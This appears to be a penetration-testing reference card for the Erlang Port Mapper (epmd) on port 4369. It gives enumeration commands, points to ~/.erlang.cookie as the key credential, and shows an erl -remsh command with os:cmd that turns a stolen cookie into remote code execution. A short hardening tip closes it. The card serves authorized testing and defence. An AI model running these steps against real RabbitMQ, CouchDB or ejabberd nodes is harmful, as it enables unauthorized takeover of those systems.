Erlang Port Mapper (epmd)
aka erlang
The name server for Erlang distributed nodes on 4369 — fronts RabbitMQ, CouchDB, ejabberd. It lists node names and ports, and with the shared Erlang cookie you get code execution on the node.
Ports
| Port | Proto | Notes |
|---|---|---|
4369 | tcp | epmd |
25672 | tcp | Erlang distribution (node) |
Fingerprint
- epmd -names lists registered nodes + their dist ports
- nmap epmd-info returns node list
Key files
| Path | Holds | Sensitive |
|---|---|---|
~/.erlang.cookie | shared secret authenticating node connections | sensitive |
Exploitation primitives
- Enumerate node names and distribution ports (recon for RabbitMQ/CouchDB/ejabberd)
- With the Erlang cookie, connect to the node and run os:cmd/1 for RCE
- Default/weak cookie → trivial node takeover
Overview
epmd on 4369 maps Erlang node names to ports. It’s the front door to anything built on Erlang/Elixir — and the Erlang cookie behind it is a master key to the node.
Enumeration
List registered nodes:
nmap -p4369 --script epmd-info <TARGET>Or locally:
epmd -d -namesRCE with the cookie
With a recovered .erlang.cookie, connect as a distributed node and execute:
erl -sname attacker -setcookie <COOKIE> -remsh <nodename>@<TARGET>Then in the Erlang shell:
os:cmd("id").Hardening
Firewall 4369/25672, use a long random Erlang cookie with strict file permissions, and bind distribution to localhost where possible.